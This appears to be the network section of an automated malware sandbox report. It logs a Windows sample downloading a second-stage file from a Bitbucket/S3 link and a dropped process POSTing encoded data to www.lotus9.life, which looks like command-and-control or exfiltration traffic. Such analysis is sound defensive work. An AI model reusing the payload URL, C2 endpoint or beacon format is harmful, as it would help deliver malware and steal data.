                                                                                                                                        Data Ascii: 24f3<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.cpamerix.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.r [TRUNCATED]
                                                                                                                                        Oct 23, 2024 07:04:04.448009014 CEST212INData Raw: 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f
                                                                                                                                        Data Ascii: ><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.cpamerix.onlin
                                                                                                                                        Oct 23, 2024 07:04:04.448021889 CEST1236INData Raw: 65 3c 2f 68 31 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1
                                                                                                                                        Data Ascii: e</h1><p class="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-butt
                                                                                                                                        Oct 23, 2024 07:04:04.448194981 CEST212INData Raw: 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e 3c 73 74 72
                                                                                                                                        Data Ascii: b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-n
                                                                                                                                        Oct 23, 2024 07:04:04.448203087 CEST1236INData Raw: 6f 6e 65 22 3e d0 9d d0 b0 d0 b4 d1 91 d0 b6 d0 bd d1 8b d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 b1 d1 8b d1 81 d1 82 d1 80 d1 8b d0 b9 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f
                                                                                                                                        Data Ascii: one"> &nbsp;</p></div></div><ul class="b-parking__features"><li class="b-parking__features-item"><strong class="b-title b-parking__features-title"></strong><p class="b-text">&nbsp;
                                                                                                                                        Oct 23, 2024 07:04:04.448317051 CEST1236INData Raw: 20 3c 62 20 63 6c 61 73 73 3d 22 62 2d 70 72 69 63 65 5f 5f 61 6d 6f 75 6e 74 22 3e 38 33 26 6e 62 73 70 3b 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 68 61 72 2d 72 6f 75 62 6c 65 2d 6e 61 74 69 76 65 22 3e 26 23 38 33 38 31 3b 3c 2f 73 70 61 6e
                                                                                                                                        Data Ascii: <b class="b-price__amount">83&nbsp;<span class="char-rouble-native">&#8381;</span> </b><span class="l-margin_left-small">&nbsp;</span></p></div></div><div class="b-parking__promo-item b-parking__promo-item_type_hosting"><strong cl
                                                                                                                                        Oct 23, 2024 07:04:04.448458910 CEST1236INData Raw: b0 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 65 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 62 6c 6f 63 6b 20 62 2d 62 75 74 74 6f 6e 5f 73 69 7a
                                                                                                                                        Data Ascii: </p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/sozdanie-saita/"></a></div><div class="b-parking__promo-item b-parking__ssl-
                                                                                                                                        Oct 23, 2024 07:04:04.448467970 CEST636INData Raw: 81 d0 b8 d1 82 d0 b5 20 d0 b0 d0 b2 d1 82 d0 be d1 80 d0 b8 d1 82 d0 b5 d1 82 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 20 d1 81 d1 80 d0 b5 d0 b4 d0 b8 20 d0 bf d0 be d1 81 d0 b5 d1 82 d0 b8 d1 82 d0 b5 d0 bb d0 b5 d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 ba
                                                                                                                                        Data Ascii: &nbsp; &nbsp; SEO-.</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')"
                                                                                                                                        Oct 23, 2024 07:04:04.448476076 CEST1236INData Raw: 69 66 20 28 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 3e 3d 20 30 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66
                                                                                                                                        Data Ascii: if ( links[ i ].href.indexOf('?') >= 0 ) { links[ i ].href = links[ i ].href + '&'; } else { links[ i ].href = links[ i ].href + '?'; }
                                                                                                                                        Oct 23, 2024 07:04:04.448484898 CEST1146INData Raw: 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 73 70 61 6e 73 5b 20 69 20 5d 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28 20 2f 5e 70 75 6e 79 2f 20 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                        Data Ascii: ngth; i++) { if ( spans[ i ].className.match( /^puny/ ) ) { var text = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spans[ i ].c


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        17192.168.2.7596643.33.130.19080484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:04:09.794462919 CEST742OUTPOST /t67j/ HTTP/1.1
                                                                                                                                        Host: www.lotus9.life
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.lotus9.life
                                                                                                                                        Content-Length: 219
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.lotus9.life/t67j/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 48 71 59 41 43 62 4f 73 56 6f 49 67 36 54 70 4b 71 35 6a 38 68 4d 63 39 4b 6c 32 58 47 65 46 4f 52 50 77 79 30 39 6d 62 57 6b 34 37 34 64 74 6e 5a 65 32 5a 63 2f 48 49 55 63 6e 68 6c 42 4c 47 57 49 76 5a 51 79 64 6b 65 75 33 78 55 61 4c 68 4d 71 54 6b 43 73 44 6b 58 44 42 70 55 73 30 4e 48 32 44 64 67 54 52 51 6f 70 43 47 4b 56 6e 76 54 72 55 70 55 66 54 66 50 33 72 75 53 56 44 49 6a 6a 58 39 61 72 73 48 48 74 63 37 38 58 4b 4d 76 6d 48 6a 31 78 74 38 49 75 2f 48 72 74 74 6a 48 72 31 57 35 49 4d 6b 77 42 37 74 5a 30 43 63 4e 6e 71 6a 77 6a 6a 57 57 66 78 4f 43 77 31 65 6b 4f 4c 55 74 46 2b 73 59 63 4b 37 58 36 57 51 43 67 3d 3d
                                                                                                                                        Data Ascii: fvM8Gh=HqYACbOsVoIg6TpKq5j8hMc9Kl2XGeFORPwy09mbWk474dtnZe2Zc/HIUcnhlBLGWIvZQydkeu3xUaLhMqTkCsDkXDBpUs0NH2DdgTRQopCGKVnvTrUpUfTfP3ruSVDIjjX9arsHHtc78XKMvmHj1xt8Iu/HrttjHr1W5IMkwB7tZ0CcNnqjwjjWWfxOCw1ekOLUtF+sYcK7X6WQCg==


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        18192.168.2.7596653.33.130.19080484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:04:12.339335918 CEST762OUTPOST /t67j/ HTTP/1.1
                                                                                                                                        Host: www.lotus9.life
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.lotus9.life
                                                                                                                                        Content-Length: 239
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.lotus9.life/t67j/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 48 71 59 41 43 62 4f 73 56 6f 49 67 38 77 78 4b 6e 34 6a 38 6f 4d 63 79 41 46 32 58 55 65 46 4b 52 50 30 79 30 38 53 4c 57 52 51 37 2f 34 52 6e 59 63 4f 5a 5a 2f 48 49 41 4d 6e 6b 72 68 4b 4b 57 49 71 6d 51 7a 78 6b 65 75 6a 78 55 59 54 68 4d 64 2f 72 42 63 44 6d 59 6a 42 72 51 73 30 4e 48 32 44 64 67 54 55 48 6f 71 79 47 4b 47 2f 76 56 50 41 32 53 76 54 63 66 48 72 75 57 56 44 4d 6a 6a 57 61 61 70 49 70 48 76 30 37 38 57 36 4d 76 56 66 73 37 78 74 36 57 65 2b 46 34 2b 41 56 43 72 56 4c 77 49 59 2f 30 52 50 33 63 43 66 2b 58 46 6d 50 75 79 62 74 53 64 56 34 56 57 6f 72 6d 50 50 4d 67 6e 4b 4e 48 72 76 52 61 6f 33 55 55 51 45 4f 57 5a 74 4c 33 32 55 38 48 41 64 59 7a 33 70 54 47 66 4d 3d
                                                                                                                                        Data Ascii: fvM8Gh=HqYACbOsVoIg8wxKn4j8oMcyAF2XUeFKRP0y08SLWRQ7/4RnYcOZZ/HIAMnkrhKKWIqmQzxkeujxUYThMd/rBcDmYjBrQs0NH2DdgTUHoqyGKG/vVPA2SvTcfHruWVDMjjWaapIpHv078W6MvVfs7xt6We+F4+AVCrVLwIY/0RP3cCf+XFmPuybtSdV4VWormPPMgnKNHrvRao3UUQEOWZtL32U8HAdYz3pTGfM=


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                        19192.168.2.7596663.33.130.19080
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:04:15.567982912 CEST1775OUTPOST /t67j/ HTTP/1.1
                                                                                                                                        Host: www.lotus9.life
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.lotus9.life
                                                                                                                                        Content-Length: 1251
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.lotus9.life/t67j/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 48 71 59 41 43 62 4f 73 56 6f 49 67 38 77 78 4b 6e 34 6a 38 6f 4d 63 79 41 46 32 58 55 65 46 4b 52 50 30 79 30 38 53 4c 57 58 49 37 34 4b 4a 6e 61 39 4f 5a 65 2f 48 49 44 4d 6e 6c 72 68 4b 48 57 4a 4f 69 51 7a 74 30 65 73 62 78 53 37 62 68 45 50 48 72 61 4d 44 6d 54 44 42 71 55 73 30 69 48 32 54 52 67 54 6b 48 6f 71 79 47 4b 41 37 76 53 62 55 32 4a 76 54 66 50 33 72 63 53 56 43 54 6a 69 2f 6c 61 70 4d 58 47 65 55 37 38 32 71 4d 38 57 37 73 7a 78 74 34 58 65 2b 6e 34 2b 4d 47 43 6f 68 74 77 4c 45 5a 30 57 37 33 63 48 43 68 51 6b 4b 66 35 7a 50 69 51 63 46 32 53 57 46 44 6f 2f 53 78 70 6b 32 66 47 37 4c 77 55 49 4c 36 5a 46 77 49 4d 2f 4d 34 38 58 6f 50 44 33 38 52 6e 56 46 46 62 62 41 53 6f 33 65 7a 54 45 52 58 49 4f 2b 68 76 73 73 72 4a 2f 58 79 43 77 4e 49 69 45 46 33 68 55 64 68 5a 64 65 76 44 46 62 72 32 30 34 59 64 48 76 4b 52 36 2b 49 76 2f 63 4b 2b 6a 2f 77 54 66 4b 7a 6a 36 6e 45 53 52 32 39 46 48 70 56 50 42 43 4c 47 55 4a 49 37 57 6c 56 4f 61 38 4d 72 6b 72 56 62 50 38 [TRUNCATED]
                                                                                                                                        Data Ascii: fvM8Gh=HqYACbOsVoIg8wxKn4j8oMcyAF2XUeFKRP0y08SLWXI74KJna9OZe/HIDMnlrhKHWJOiQzt0esbxS7bhEPHraMDmTDBqUs0iH2TRgTkHoqyGKA7vSbU2JvTfP3rcSVCTji/lapMXGeU782qM8W7szxt4Xe+n4+MGCohtwLEZ0W73cHChQkKf5zPiQcF2SWFDo/Sxpk2fG7LwUIL6ZFwIM/M48XoPD38RnVFFbbASo3ezTERXIO+hvssrJ/XyCwNIiEF3hUdhZdevDFbr204YdHvKR6+Iv/cK+j/wTfKzj6nESR29FHpVPBCLGUJI7WlVOa8MrkrVbP8RUFW/oK3L7TQunyaYf3GE1oMNcS6g0wjJSzY2LANQTRaNK9NhCAzYKN5kOplao20A7wQi56mb/BmdDR4xGuWqX4QgBK6cVq8i0Sx41ljpnPPWS7YJ0qsGHuLf+eNsk5zd8Xl7rWFeO4D7xscz+Iln43FRMQKh8qTM2c/7MjWDPFlzK5USO48sVJTNTa9DA1BccIsyoR2fxvLFspY9iCad67L9/E+Qzt/9im8T9vhL9MCjdJJHchW9hFhpRk6pz4YHm3blfMYqO0ZamrCxRiH08dtU4hzQqnRLrs6AYBi0ToRYwN9k3luvWVVhidlb5900lUhQz2Jdyr/s9FTnLV4qgN8IqXTTVdg5WvJRAcuH27AhsK2fG4vtYQHCDPl21I9vcdHdWw3J0hgaN6Sk/6iHaqbX6nj7qVtBcwzwRy3oY61zwC0GXtnSWVqwdHbZI6LYFDWWdI023nbeRBRlPv8w6iiyV2Je5ydq+OJ7sMXwdcZWSV0PoESywRdQjoDcDpczn0FU5fknIlhK71+GHlXgEf3sPx4OxSnoloM6jxfIrMADznBPB7V4yszIbBm3v2ujXWbsK1Dwo92bpD3opYOmmB2orZTTuoPL3UgYX4m2knoSExyiKoXCQ2jpLNFcC3xJD462kqMRM5ZGTqN6CZ8Y3yWKExGoOaLV4 [TRUNCATED]


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                        20192.168.2.7596673.33.130.19080
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:04:18.113260984 CEST484OUTGET /t67j/?fvM8Gh=KowgBu3DXf0G7hBLtaH8s8ZzKm+VG/tpKZ1Q7eDBR0ArwNxjdNGLI+rTTcfRvEyEYs27WEZYXeTRVuyNENDuSquLWx1vE6gNEX6tkQ0IxcS5dAyUTa1RZ/bXBmbIS1WdqDLnMr1sBa9m&DfDx=AFrxfzcH-Ld HTTP/1.1
                                                                                                                                        Host: www.lotus9.life
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Connection: close
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Oct 23, 2024 07:04:18.771471977 CEST419INHTTP/1.1 200 OK
                                                                                                                                        Server: openresty
                                                                                                                                        Date: Wed, 23 Oct 2024 05:04:18 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 279
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 76 4d 38 47 68 3d 4b 6f 77 67 42 75 33 44 58 66 30 47 37 68 42 4c 74 61 48 38 73 38 5a 7a 4b 6d 2b 56 47 2f 74 70 4b 5a 31 51 37 65 44 42 52 30 41 72 77 4e 78 6a 64 4e 47 4c 49 2b 72 54 54 63 66 52 76 45 79 45 59 73 32 37 57 45 5a 59 58 65 54 52 56 75 79 4e 45 4e 44 75 53 71 75 4c 57 78 31 76 45 36 67 4e 45 58 36 74 6b 51 30 49 78 63 53 35 64 41 79 55 54 61 31 52 5a 2f 62 58 42 6d 62 49 53 31 57 64 71 44 4c 6e 4d 72 31 73 42 61 39 6d 26 44 66 44 78 3d 41 46 72 78 66 7a 63 48 2d 4c 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fvM8Gh=KowgBu3DXf0G7hBLtaH8s8ZzKm+VG/tpKZ1Q7eDBR0ArwNxjdNGLI+rTTcfRvEyEYs27WEZYXeTRVuyNENDuSquLWx1vE6gNEX6tkQ0IxcS5dAyUTa1RZ/bXBmbIS1WdqDLnMr1sBa9m&DfDx=AFrxfzcH-Ld"}</script></head></html>


                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        0192.168.2.749700185.166.143.484436452C:\Users\user\Desktop\z10982283782.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-10-23 05:02:10 UTC187OUTGET /akeem4u/canter/downloads/233_Ltspwqrtysw HTTP/1.1
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Accept: */*
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                        Host: bitbucket.org
                                                                                                                                        2024-10-23 05:02:11 UTC5171INHTTP/1.1 302 Found
                                                                                                                                        Date: Wed, 23 Oct 2024 05:02:10 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Content-Length: 0
                                                                                                                                        Server: AtlassianEdge
                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX [TRUNCATED]
                                                                                                                                        Expires: Wed, 23 Oct 2024 05:02:10 GMT
                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                        X-Used-Mesh: False
                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                        Content-Language: en
                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                        X-Served-By: c14a22a3cd72
                                                                                                                                        X-Version: 4bc3453affe5
                                                                                                                                        X-Static-Version: 4bc3453affe5
                                                                                                                                        X-Request-Count: 2604
                                                                                                                                        X-Render-Time: 0.04558157920837402
                                                                                                                                        X-B3-Traceid: d85e515e909142ad9964c861258da2ea
                                                                                                                                        X-B3-Spanid: bef8bd19de60bfbe
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        Content-Security-Policy: base-uri 'self'; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian. [TRUNCATED]
                                                                                                                                        X-Usage-Quota-Remaining: 999069.913
                                                                                                                                        X-Usage-Request-Cost: 943.40
                                                                                                                                        X-Usage-User-Time: 0.023097
                                                                                                                                        X-Usage-System-Time: 0.005205
                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                        Age: 0
                                                                                                                                        X-Cache: MISS
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                        Atl-Traceid: d85e515e909142ad9964c861258da2ea
                                                                                                                                        Atl-Request-Id: d85e515e-9091-42ad-9964-c861258da2ea
                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                        Server-Timing: atl-edge;dur=155,atl-edge-internal;dur=3,atl-edge-upstream;dur=153,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        1192.168.2.7497013.5.3.654436452C:\Users\user\Desktop\z10982283782.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-10-23 05:02:11 UTC1295OUTGET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX0TejNIhed6dqnVS8HwylTQKvAyrfpMWEXQYcoRuCgC5H [TRUNCATED]
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Accept: */*
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                        2024-10-23 05:02:11 UTC564INHTTP/1.1 200 OK
                                                                                                                                        x-amz-id-2: a+6/7NBfmAlWkTUCbl5L0tLo4RpXpylx49dKdhuo6+4Q5Og9MfOkAMotL/wUhfU56A9tFCcGYVEx/uPIPiA9jl/WHUCm3DL0
                                                                                                                                        x-amz-request-id: SRJDQ19JASGF73X4
                                                                                                                                        Date: Wed, 23 Oct 2024 05:02:12 GMT
                                                                                                                                        Last-Modified: Tue, 22 Oct 2024 05:16:04 GMT
                                                                                                                                        ETag: "5d7ab335987101c49bbbe6ebcea19843"
                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                        x-amz-version-id: aV2sZzfG3ESjVStuXavykQrQq1UCdUQQ
                                                                                                                                        Content-Disposition: attachment; filename="233_Ltspwqrtysw"
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        Server: AmazonS3
                                                                                                                                        Content-Length: 383200
                                                                                                                                        Connection: close
